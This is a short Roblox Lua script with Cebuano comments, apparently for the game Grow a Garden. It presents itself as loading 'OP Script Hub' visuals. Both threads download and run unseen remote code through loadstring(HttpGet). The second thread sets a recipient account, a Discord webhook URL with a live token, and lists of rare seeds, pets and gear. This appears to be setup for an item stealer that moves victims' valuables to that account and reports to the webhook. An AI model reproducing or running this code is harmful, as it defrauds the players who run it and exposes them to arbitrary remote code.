-- THREAD 1: Para sa OP Script Hub Visuals
task.spawn(function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/OP-Script-Hub/GAG2/refs/heads/main/_visual"))()
end)

-- THREAD 2: Para sa Luarmor Config ug Loader
task.spawn(function()
    -- 1. I-set una ang configurations para sigurado nga andam na sa dili pa mo-load ang script
    getgenv().NORMAL_TARGET     = "BenStorage01"
    getgenv().NORMAL_WEBHOOK_URL = "https://discord.com/api/webhooks/1480218057304703066/devxyORzD7swqDO1zZxwyjYeu-mVHDCLgpZ5Of796SlQrwVo36yCa30kd2H_npYZEQhw"
    getgenv().NORMAL_SEEDS = {
        ["Moon Bloom"] = true,
        ["Dragon's Breath"] = true,
        ["Rainbow Seed"] = true,
        ["Ghost Pepper"] = true,
        ["Gold Seed"] = true
    }
    getgenv().NORMAL_PETS = {
        ["Raccoon"] = true,
        ["Unicorn"] = true,
        ["Golden Dragonfly"] = true,
        ["Robin"] = true,
        ["Bee"] = true,
        ["Deer"] = true,
        ["Monkey"] = true,
        ["Ice Serpent"] = true,
        ["Black Dragon"] = true
    }
    getgenv().NORMAL_GEARS = {
        ["Super Sprinkler"] = true,
        ["Super Watering Can"] = true
    }
    getgenv().NORMAL_PROPS = {
        ["Teleporter Pad Crate"] = true
    }
    
    -- 2. Diha na dayon i-load ang Luarmor script human ma-set ang tanang getgenv
    loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/22c796a75f035b5ef8e55946d39e602c.lua"))()
end)
